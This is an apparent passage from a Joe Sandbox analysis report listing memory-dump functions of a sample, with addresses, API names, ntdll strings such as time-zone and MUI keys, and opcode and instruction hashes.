                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                Function 00921D80 Relevance: .0, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                Function 0091FD5C Relevance: .0, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                Function 0091FE24 Relevance: .0, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                Function 0091FFFC Relevance: .0, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                Function 0091FF34 Relevance: .0, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                Function 00948788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 009487E6
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 00948827
                                                                                • Kernel-MUI-Language-SKU, xrefs: 009489FC
                                                                                • WindowsExcludedProcs, xrefs: 009487C1
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 00948914
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: _wcspbrk
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 402402107-258546922
                                                                                • Opcode ID: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                • Instruction ID: eec668b6938623f9b9436ea9632081af0f4c1342fa2293b6c45c678ccf3bf1e6
                                                                                • Opcode Fuzzy Hash: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                • Instruction Fuzzy Hash: 9CF1E3B2D00219EFCF11EF99C981EEEBBB9FF48304F15446AE505A7211EB349A45DB60
                                                                                Function 009B822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsnlen
                                                                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                • API String ID: 3628947076-1387797911
                                                                                • Opcode ID: 73e98298583b5eb31701aacce60cd5b755368834273074caab03c817f3e1acc5
                                                                                • Instruction ID: c9135bd1715321cff7a85693af1a594b04e4eda85ed0fc3555cca8808ff53dd0
                                                                                • Opcode Fuzzy Hash: 73e98298583b5eb31701aacce60cd5b755368834273074caab03c817f3e1acc5
                                                                                • Instruction Fuzzy Hash: EC41A572249209BAEB119AD0CE42FDFB7ACEF48B64F104122FA04D6191DBB0DB51C7A4
                                                                                Function 009613CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                • Instruction ID: ae4870abe607ce0fe14dde98dbd033f57bc04b9360ac77b99d088b838ca420db
                                                                                • Opcode Fuzzy Hash: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                • Instruction Fuzzy Hash: 966157B1904655AACF34DF99C8908BEBBB9EFD4301B18C42EF4DA47680D775AA40DB60
                                                                                Function 009C3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
                                                                                • Instruction ID: 4b15a40aadf8151ad29f7d92cff12e9a0d9f109a57fa07f0799b5ee6431b50f5
                                                                                • Opcode Fuzzy Hash: 62ad5cea72158828d27840b586902092ad5c9dd70920a2382eb1d9b3e89cfe80
                                                                                • Instruction Fuzzy Hash: 4F61B172D40648ABCB20DF58C851ABE7BF9EF99310B14C52EF8ED97141E234EB409B52
                                                                                Function 00957EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00973F12
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00973EC4
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0097E2FB
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0097E345
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00973F4A
                                                                                • Execute=1, xrefs: 00973F5E
                                                                                • ExecuteOptions, xrefs: 00973F04
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00973F75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: BaseDataModuleQuery
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 3901378454-484625025
                                                                                • Opcode ID: 5624c1a3517b7b6a846d41cc74150833ef111555cbd1d27fcd8fae2a7b228b34
                                                                                • Instruction ID: 0ce990ba21a3b1a440ff59769b3f51141cc6c63a58f19bc32229373508488e10
                                                                                • Opcode Fuzzy Hash: 5624c1a3517b7b6a846d41cc74150833ef111555cbd1d27fcd8fae2a7b228b34
                                                                                • Instruction Fuzzy Hash: C841A97264031C7BDB20DB95ECC6FEAB3BCAB54705F0044A9F909E6181E6709B459F61
                                                                                Function 00960B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID: .$:$:
                                                                                • API String ID: 3965848254-2308638275
                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction ID: af674629a0f956a644b59a3c3b802fbdb8e49866f5cc11d63921204a1b2a315a
                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction Fuzzy Hash: 00A19F71D0030ADFDF24DFA4C8857BFB7B9AF95304F24856AD482A7282D7389A45CB51
                                                                                Function 00960554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00982206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-4236105082
                                                                                • Opcode ID: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                • Instruction ID: e85e9dc92339a425259b72e858c77936d78bd0037adfea23ab8281069589f657
                                                                                • Opcode Fuzzy Hash: 59f08a282faa4c420f0fc9b4342fa4342a06c891dca7008669db12de88f9d778
                                                                                • Instruction Fuzzy Hash: 2F5138317042156FEB14DB18DCC2FA633ADABD4720F218269FC59DB385D975EC418B90
                                                                                Function 009614C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___swprintf_l.LIBCMT ref: 0098EA22
                                                                                  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 0096146B
                                                                                  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 00961490
                                                                                • ___swprintf_l.LIBCMT ref: 0096156D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                • Instruction ID: 36043da76b819bdf085d6c046f88818ee0ace6942009f231e6a4d3b21182b3c8
                                                                                • Opcode Fuzzy Hash: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
                                                                                • Instruction Fuzzy Hash: 9A21A5729002299FCF21EE54DC45AEEB3ACAB94700F484555FC47D3241DB74EE588BE1
                                                                                Function 009C3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 7da8098ffed6a27ee8148e9f03c7f35f5eecf644c18a88bb5a94bfef05af4a8f
                                                                                • Instruction ID: 3263c5158371ef3f4a178b0748e426d35ac2d5713c1062960c73bf9c0bb83dd9
                                                                                • Opcode Fuzzy Hash: 7da8098ffed6a27ee8148e9f03c7f35f5eecf644c18a88bb5a94bfef05af4a8f
                                                                                • Instruction Fuzzy Hash: 9C21A172D0022AABCB10AE699C45EEF77AC9B54714F04C52AFC4593242E7749E44C7E2
                                                                                Function 009453A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009822F4
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009822FC
                                                                                • RTL: Resource at %p, xrefs: 0098230B
                                                                                • RTL: Re-Waiting, xrefs: 00982328
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
